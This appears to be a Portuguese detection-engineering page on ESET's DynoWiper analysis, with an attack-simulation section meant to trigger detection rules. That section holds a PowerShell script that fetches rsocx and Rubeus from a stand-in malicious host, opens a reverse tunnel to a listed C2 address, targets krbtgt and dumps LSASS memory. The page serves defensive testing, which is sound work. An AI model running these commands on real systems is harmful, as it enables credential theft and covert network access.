Atualização DynoWiper da ESET Research: Análise técnica e atribuição
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
DynoWiper é um destrutivo wiper usado contra uma organização do setor de energia na Polônia, impactando múltiplos endpoints durante as operações. Os executáveis foram armazenados em um local compartilhado na rede e lançados diretamente desse compartilhamento. A ESET atribui a atividade ao Sandworm com confiança média. Uma vez executado, o malware corrompe arquivos alvos com bytes aleatórios e aciona uma reinicialização forçada para completar o impacto.
Investigação
A ESET recuperou três amostras—schtask.exe, schtask2.exe, e _update.exe—soltas em C:inetpubpub. Caminhos PDB embutidos sugerem que os binários foram compilados em um ambiente Vagrant. A engenharia reversa mostrou uma rotina de eliminação em três etapas, com duas variantes inserindo uma pausa de cinco segundos entre as fases. Artefatos pós-compromisso também incluíram a ferramenta Kerberos Rubeus e um proxy SOCKS5 rsocx dentro da rede da vítima.
Mitigação
O ESET PROTECT nos sistemas da vítima bloqueou todas as três variantes, limitando os danos. Reduza a exposição prevenindo a criação de tarefas agendadas não autorizadas e monitorando escritas inesperadas em diretórios compartilhados. Adicione uma lista de permissões de aplicativos e desative a execução a partir de compartilhamentos de rede sempre que possível.
Resposta
Identifique e isole hosts que executam schtask.exe, schtask2.exe ou *_update.exe de um compartilhamento. Preserve evidências voláteis, revise tarefas agendadas e rastros de implantação do PowerShell, e remova ferramentas como Rubeus e rsocx. Realize uma análise forense completa e restaure dados de backups limpos verificados.
Fluxo de Ataque
Detecções
Operação Potencial de Auto-remoção de Malware ou Ocultação de Stderr (via cmdline)
Ver
Desligamento Usado Para Forçar uma Interrupção ou Reinicialização do Sistema (via cmdline)
Ver
IOCs (HashSha1) para detectar: Atualização da ESET Research DynoWiper: Análise técnica e atribuição
Ver
IOCs (SourceIP) para detectar: Atualização da ESET Research DynoWiper: Análise técnica e atribuição
Ver
IOCs (DestinationIP) para detectar: Atualização da ESET Research DynoWiper: Análise técnica e atribuição
Ver
Detecção de Implantação do DynoWiper via Execução de Tarefa Agendada [Evento de Arquivo do Windows]
Ver
Detecção de Ferramentas Maliciosas e Despejo de Memória LSASS [Criação de Processo do Windows]
Ver
Execução da Simulação
Pré-requisito: O Controle Pré-voo de Telemetria & Base deve ter passado.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a diagnósticos incorretos.
-
Narrativa do Ataque & Comandos:
- Estabelecer um proxy SOCKS5 reverso usando
rsocx.exe. O adversário baixa o binário de um servidor externo, o coloca em%TEMP%, e o executa com o argumento-r 31.172.71.5:8008para criar um túnel reverso de volta para o host C2. - Realizar abuso de ticket Kerberos com
rubeus.exe. A ferramenta é executada para solicitar um ticket de concessão de ticket Kerberos (TGT) para a conta de administrador do domínio e, posteriormente, forjar um ticket de serviço (s4u2self). - Despejar memória LSASS usando
procdump.exe(uma alternativa comum ao Gerenciador de Tarefas) para capturar material de credencial. Sysmon registra um evento de Acesso a Processo onde o processo do atacante acessaprocdump.exeprocesso acessalsass.execom a máscara de acesso concedida0x1010(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION)).
- Estabelecer um proxy SOCKS5 reverso usando
-
Script de Teste de Regressão:
# ------------------------------------------------------------- # Script de simulação – aciona a regra Sigma para rsocx, rubeus, # e despejo de LSASS. Execute com privilégios administrativos. # ------------------------------------------------------------- # 1. Deploy rsocx.exe (proxy SOCKS5 reverso) $rsocxPath = "$env:TEMPrsocx.exe" Invoke-WebRequest -Uri "http://malicious.example.com/rsocx.exe" -OutFile $rsocxPath Start-Process -FilePath $rsocxPath -ArgumentList "-r 31.172.71.5:8008" -WindowStyle Hidden # 2. Deploy rubeus.exe (abuso de Kerberos) $rubeusPath = "$env:TEMPrubeus.exe" Invoke-WebRequest -Uri "http://malicious.example.com/rubeus.exe" -OutFile $rubeusPath Start-Process -FilePath $rubeusPath -ArgumentList "dump /service:krbtgt" -WindowStyle Hidden # 3. Dump LSASS usando procdump (requer Sysinternals) $procdumpPath = "$env:TEMPprocdump.exe" Invoke-WebRequest -Uri "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMPprocdump.zip" Expand-Archive -Path "$env:TEMPprocdump.zip" -DestinationPath $env:TEMP -Force $procdumpExe = Get-ChildItem "$env:TEMP" -Recurse -Filter "procdump.exe" | Select-Object -First 1 if ($procdumpExe) { Copy-Item $procdumpExe.FullName $procdumpPath -Force Start-Process -FilePath $procdumpPath -ArgumentList "-ma lsass.exe $env:TEMPlsass.dmp" -Wait } Write-Host "Simulação concluída. Verifique o SIEM para alertas." -
Comandos de Limpeza:
# Termine quaisquer processos maliciosos remanescentes Get-Process -Name "rsocx","rubeus","procdump" -ErrorAction SilentlyContinue | Stop-Process -Force # Remova binários e arquivos dump Remove-Item -Path "$env:TEMPrsocx.exe","$env:TEMPrubeus.exe","$env:TEMPprocdump.exe","$env:TEMPlsass.dmp" -Force -ErrorAction SilentlyContinue # Opcionalmente, exclua diretórios de download temporários Remove-Item -Path "$env:TEMPProcdump.zip","$env:TEMPprocdump" -Recurse -Force -ErrorAction SilentlyContinue Write-Host "Limpeza concluída."